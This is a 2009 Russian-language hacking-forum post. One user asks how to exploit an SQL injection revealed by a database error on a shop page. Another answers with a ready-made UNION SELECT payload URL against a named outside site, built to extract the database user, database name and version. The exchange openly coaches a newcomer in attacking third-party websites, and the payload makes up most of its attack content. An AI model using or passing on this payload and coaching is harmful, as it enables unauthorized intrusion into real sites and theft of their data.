Ваши вопросы по уязвимостям.

#11

10.04.2009, 15:51

DrAssault

Участник форума

Регистрация: 14.11.2008

Сообщений: 149

С нами: 9204308

Репутация: 256

Цитата:

Сообщение от DimOnOID

Да ты что?Как ты хексе то подставишь?...как подставишь в кесе так он и запишит в хексе..

Не надо кричать!!! Тебе пример привести чтоли??? Я не говорю про пути!!! Где ты в пути видел знаки () и <> у???

Цитата:

Сообщение от m0Hze

Имею страницу:
site.ru/magazine/tapki.html
Если подставить /tapki'.html - то вылазиет

Код:

Warning: Wrong parameter count for mysql_result() in D:\host\magazine\index.php on line 26

Если подставить просто /tapki' то ничего неслучиться,идет проверка на расширение
Так вот,возможноли раскрутить? Так ака это мой первый опыт проведения SQL-inj то пожалуйста поподробнее.ЗАрание спасибо.

Можно конечно, крутится как обычная скуля, вот пример тебе:

Код:

http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat_ws(0x3a,user(),database(),version()),25,26,27,28,29,30,31,32,33,34.html

Источник: http://www.karabas.info/

Последний раз редактировалось DrAssault; 10.04.2009 в 15:55..